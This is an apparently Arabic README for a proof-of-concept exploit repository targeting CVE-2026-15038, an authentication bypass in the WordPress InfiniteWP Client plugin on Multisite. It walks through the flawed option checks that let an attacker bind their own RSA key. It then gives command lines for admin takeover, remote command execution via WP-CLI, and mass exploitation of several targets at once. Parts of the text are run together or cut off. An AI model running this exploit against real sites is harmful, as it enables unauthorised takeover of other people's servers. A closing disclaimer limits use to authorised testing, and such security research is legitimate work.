
استغلال PoC لثغرة CVE-2026-15038 في إضافة InfiniteWP Client الخاصة بـ WordPress: يتجاوز آلية المصادقة على Multisite، ويربط مفتاح RSA الخاص بالمهاجم، ويرفع الصلاحيات للاستيلاء على حساب المسؤول، وينفّذ أوامر عن بُعد عبر WP-CLI.
الاستيلاء على حساب المدير دون مصادقة في WordPress Multisite
إضافة InfiniteWP Client لووردبريس (< 1.13.6) تحتوي على ثغرة حرجة في تجاوز المصادقة تؤثر على تثبيتات Multisite.
يمكن لمهاجم غير مصادق:
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id')
&& !$iwp_mmb_core->get_option('iwp_client_public_key'))
get_site_option() → يقرأ من مستوى الشبكة (wp_sitemeta)update_blog_option() → يكتب إلى مستوى المدونة (wp_X_options)💥 النتيجة: في Multisite، يعيد الحارس دائمًا false — إعادة الاقتران مسموحة دائمًا.
if(trim($activation_key) != get_option('iwp_client_activate_key')){
get_option() القيمة falseactivation_key → trim(null) → '''' != false → false → ينجح الفحص 🎯openssl_verify()graph LR
A[Send POST Request] --> B[Add Site Action]
B --> C[Guard Bypassed]
C --> D[Activation Key Check Fails]
D --> E[Signature Verifies]
E --> F[Attacker Key Bound]
F --> G[Full Admin Access]
G --> H[RCE Achieved]
# Clone the repository
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038
# Install dependencies
pip install -r requirements.txt
python3 exploit.py -t https://wordpress.ddev.site
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce
| الملف | الوصف |
|---|---|
exploit.py | 🐍 سكربت الاستغلال الرئيسي مع دعم الاستغلال الجماعي |
requirements.txt | 📦 تبعيات Python |
README.md | 📖 هذا التوثيق |
add_site الأخيرة في السجلاتهذه الأداة لأغراض تعليمية واختبار أمني فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. لا يتحمل المؤلفون أي مسؤولية عن إساءة الاستخدام.